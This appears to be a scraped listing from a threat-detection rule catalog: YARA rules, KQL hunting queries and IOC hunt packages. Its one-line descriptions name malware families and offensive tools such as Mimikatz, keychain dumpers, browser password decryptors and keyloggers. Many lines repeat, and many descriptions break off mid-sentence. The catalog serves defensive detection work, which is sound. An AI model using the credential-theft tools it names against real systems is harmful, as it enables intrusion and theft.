Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
SType Backdoor
yara low
The SType_Backdoor rule detects a sophisticated backdoor variant associated with advanced persistent threat (APT) campaigns, leveraging indicators linked to
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Mirai
ThreatFox: RedTail IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 3 IOCs associated with RedTail
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
XMRIG is a cryptocurrency mining malware that leverages compromised systems to mine Monero, often deploying stealthily to avoid detection. It typically arrives via phishing emails, malicious websites, or exploit kits, using URLs and IP:port connections to establish command-and-control channels. SOC analysts should monitor for unusual CPU usage, unexpected outbound network traffic, and signs of cryptocurrency mining activities beyond the listed IOCs.
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 78 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with FAKEUPDATES
ThreatFox: KongTuke IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 44 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 21 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 11 IOCs associated with Unknown Stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Cobalt Strike is
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with DCRat
ThreatFox: Xtreme RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Xtreme RAT
ThreatFox: Eye Pyramid IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Eye Pyramid
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with Lumma Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with Remcos
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with SectopRAT
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Vidar is a data exfiltration malware that steals credentials and sensitive information via encrypted channels, often leveraging stolen
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 12 IOCs associated with VShell
Adupib SSL Backdoor
yara low
Adupib SSL Backdoor
Dipsind Family
yara low
Dipsind Family
Installer component
yara low
The Trojan
Dipsind variant
yara low
Dipsind variant
Installer component
yara low
Installer component
Raw-input based keylogger
yara low
Raw-input based keylogger
Keylogger component
yara low
Keylogger component
Hook-based keylogger
yara low
Hook-based keylogger
Loader / possible incomplete LSA Password Filter
Variant of the JPin backdoor
yara low
Variant of the JPin backdoor
Hotpatching Injector
yara low
Hotpatching Injector
Installer component
yara low
Installer component
URLhaus: 172-86-72-167 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 172-86-72-167
URLhaus: 172-86-73-37 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 172-86-73-37
URLhaus: 172-86-89-57 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 172-86-89-57
URLhaus: 172-86-89-92 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 172-86-89-92
URLhaus: 172-86-91-40 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 172-86-91-40
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 44 malicious URLs tagged as 32-bit
URLhaus: 45-61-150-97 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 45-61-150-97
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 17 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as Mozi
Zlib Backdoor
yara low
YARA rule: Zlib_Backdoor
The YARA rule 'OPCLEAVER_antivirusdetector' identifies a
Keylogger used by attackers in Operation Cleaver
Backdoor used by attackers in Operation Cleaver
ARP cache poisoner used by attackers in Operation Cleaver
The YARA
Keylogger used by attackers in Operation Cleaver
Mimikatz Wrapper used by attackers in Operation Cleaver
Net Crawler used by attackers in Operation Cleaver
Parviz developer known from Operation Cleaver
Parviz tool used by attackers in Operation Cleaver
Parviz tool used by attackers in Operation Cleaver
Shell Creator used by attackers in Operation Cleaver to create ASPX web shells
Malware or hack tool used by attackers in Operation Cleaver
Malware or hack tool used by attackers in Operation Cleaver
Tiny Bot used by attackers in Operation Cleaver
Backdoor used by attackers in Operation Cleaver
Network tool used by Iranian hackers and used by attackers in Operation Cleaver
Hack tool used by attackers in Operation Cleaver
Mimikatz wrapper used by attackers in Operation Cleaver
Keywords used by attackers in Operation Cleaver
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
The detection rule identifies suspicious file
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
ThreatFox: Mirai IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 11 IOCs associated with Mirai
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 75 IOCs associated with ClearFake
ThreatFox: IClickFix IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with IClickFix
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 39 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Hunt package for 2 IOCs associated with Unknown Stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 16 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with DCRat
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Havoc
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Remcos
ThreatFox: SectopRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with SectopRAT
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a data-stealing malware that exfiltrates credentials, system information, and sensitive files via encrypted communication with command-and
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
ValleyRAT is a remote access trojan designed for
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 20 IOCs associated with VShell
URLhaus: 195-96-132-13 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as 195-96-132-13
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 44 malicious URLs tagged as 32-bit
URLhaus: 45-198-224-8 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as 45-198-224-8
URLhaus: 95-164-6-120 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as 95-164-6-120
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as ClearFake
URLhaus: d52f85 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as d52f85
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
APT NGO wuaclt
yara low
YARA rule: APT_NGO_wuaclt
APT NGO wuaclt PDF
yara low
YARA rule: APT_NGO_wuaclt_PDF
Backdoor APT Mongal
yara low
YARA rule: Backdoor_APT_Mongal
Gentlemen Ransomware C2 domain connection
kql medium
T1568.002T1567.002
DeviceNetworkEvents
This query identifies outbound connections to decentralized Web3 C2s, TryCloudflare tunnels, and abused SaaS platforms associated with the EtherRAT, TukTuk, and Gentlemen ransomware intrusion chains.
T1204.002T1574.002
DeviceFileEvents
This query detects the presence, creation, or execution of known payloads involved in the EtherRAT, TukTuk, and Gentlemen ransomware intrusion chains.
Guest user account type changed to member
kql medium
T1098
AuditLogs
Identifies Entra ID user accounts converted from Guest to Member type, which grants full member-level access and may indicate an attacker elevating a compromised guest account to persistent tenant acc
LockBit and related tool hash IoCs
kql medium
T1486T1204
DeviceFileEvents
Identifies file creation or modification events matching SHA256 hashes associated with an Apache ActiveMQ exploit, defense evasion scripts, and LockBit ransomware deployment.
Mirage
yara low
Mirage
Mirage APT
yara low
YARA rule: Mirage_APT
Mirage Identifying Strings
yara low
Mirage Identifying Strings
Molerats certs
yara low
YARA rule: Molerats_certs
Mongal
yara low
Mongal
Mongal code features
yara low
Mongal code features
Mongal Identifying Strings
yara low
Mongal Identifying Strings
T1098.001
AuditLogs
Identifies additions of new owners to Entra ID service principals. SP ownership grants full credential management capability; an attacker who adds themselves as owner can subsequently add credentials
OAuth application redirect URI modified
kql medium
T1528
AuditLogs
Identifies modifications to OAuth application redirect URIs in Entra ID. Adding a redirect URI controlled by an attacker allows interception of OAuth authorization codes, enabling token theft from use
T1098.003T1136.003
AuditLogs
Identifies directory role assignments to accounts created less than 24 hours earlier in the same tenant. An account receiving a privileged role shortly after creation may indicate a backdoor account s
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1556.006T1098
AuditLogs
Identifies Temporary Access Pass creations in Entra ID. A TAP allows passwordless authentication and bypasses existing credential requirements. Creation outside a managed onboarding process may indica
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Evilginx
ThreatFox: XMRIG IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 4 IOCs associated with XMRIG
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 78 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 27 IOCs associated with Unknown malware
ThreatFox: ACR Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with ACR Stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEvents
Hunt package for 8 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with DCRat
ThreatFox: Latrodectus IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 12 IOCs associated with Latrodectus
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 16 IOCs associated with Quasar RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with Remcos
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a data exfiltration malware that steals credentials and sensitive information by leveraging compromised systems. It typically arrives via phishing emails containing malicious attachments or URLs that redirect to command-and-control servers. SOC analysts should monitor for unusual outbound traffic
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 8 IOCs associated with VShell
URLhaus: 176-65-139-77 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as 176-65-139-77
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 20 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 41 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mirai malware family is a botnet that compromises IoT devices by scanning for default credentials and deploying DDoS attacks. It typically arrives via malicious URLs or domains used to distribute exploit kits or phishing payloads. SOC analysts
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as Mozi
T1539T1550
AADNonInteractiveUserSignInLogsSigninLogs
Identifies non-interactive sign-ins from a different IP and autonomous system than the preceding interactive sign-in for the same user within a 10-minute window, consistent with AiTM phishing token re
T1098.003
AuditLogsSigninLogs
Identifies actors who perform three or more Entra ID directory role assignments within a ten-minute window, consistent with automated post-compromise persistence. Results are enriched with the actor's
T1528T1078.004
SigninLogs
Identifies successful device code flow sign-ins from autonomous system numbers not seen for the user in the previous 30 days. Consistent with device code phishing: attacker initiates the flow, tricks
T1098.001T1098.003T1078.004
AuditLogsSigninLogs
Identifies guest accounts (B2B external identities) initiating high-impact Entra ID operations: role assignments, service principal credentials, policy changes. Guest as initiator suggests a compromis
http://www.cvedetails.com/cve/cve-2015-5889
tpwn exploits a null pointer dereference in XNU to escalate privileges to root.
For reading OS X keychain passwords as root.
Dirty user level command line keylogger hacked together in Swift.
A simple and easy to use keylogger for macOS.
A simple keylogger for macOS.
yara low
A simple keylogger for macOS.
A simple keylogger for macOS.
yara low
A simple keylogger for macOS.
A simple keylogger for macOS.
yara low
A simple keylogger for macOS.
LogKext is an open source keylogger for Mac OS X, a product of FSB software.
ofxKeylogger keylogger.
yara low
ofxKeylogger keylogger.
It is a simple and easy to use keylogger for macOS written in Swift.
MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers.
Pulls iCloud Contacts for an account. No dependencies. No user notification.
This program decrypts / extracts all authorization tokens on macOS / OS X / OSX.
Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X.
chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner.
Keychain dumping utility.
yara low
Keychain dumping utility.
Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains
intercepts ssh connections to capture credentials
masscan is a performant port scanner, it produces results similar to nmap
Allows for TCP tunneling over HTTP
yara low
Allows for TCP tunneling over HTTP
https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/
A tool for injecting arbitrary code into running Python processes.
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server
https://foxglovesecurity.com/2016/01/16/hot-potato/
Mimikatz credential dump tool: Author copywrite
Mimikatz credential dump tool: Error messages
Mimikatz credential dump tool: Files
yara low
Mimikatz credential dump tool: Files
Mimikatz credential dump tool: Modules
Mimikatz credential dump tool
yara low
Mimikatz credential dump tool
creddump is a python tool to extract credentials and secrets from Windows registry hives.
Command shell wrapper for WMI
yara low
Command shell wrapper for WMI
Delivers a text payload via RDP (rubber ducky)
A PowerShell based tool that is designed to act like a RAT
Mach-O binaries
yara low
Mach-O binaries
T1556.006
AuditLogsSigninLogs
Identifies MFA method registration events where the source IP address has not appeared in the registering user's 30-day sign-in history. An attacker who obtains credentials may register a new MFA meth
T1528
AuditLogs
Identifies OAuth application consent events where high-risk permissions such as Directory.ReadWrite.All or RoleManagement.ReadWrite.Directory were granted to apps with no prior tenant consent history
T1078.004T1562.001
AuditLogsSigninLogs
Identifies directory role holders signing in via legacy authentication protocols (which bypass Conditional Access MFA), correlated with a high-impact audit operation within one hour. Suggests credenti
Process accessed LSASS from unbacked memory
kql medium
T1003.001
WindowsEvent
Identifies processes accessing LSASS from unmapped or unbacked memory regions. This physics-based behavior strongly indicates process hollowing or shellcode injection credential dumping, bypassing sta
T1078.004T1098
AuditLogsSigninLogs
Identifies successful sign-ins from a country absent in the user's 30-day history, followed within one hour by a sensitive AuditLogs operation (role assignment, consent grant, credential addition, CA
T1556.006T1078.004
AuditLogsSigninLogs
Identifies successful sign-ins from IP addresses not seen in the prior 30 days occurring within 60 minutes of MFA being disabled for the same account, consistent with post-compromise credential use af
ThreatFox: Mirai IOCs
ioc-hunt high
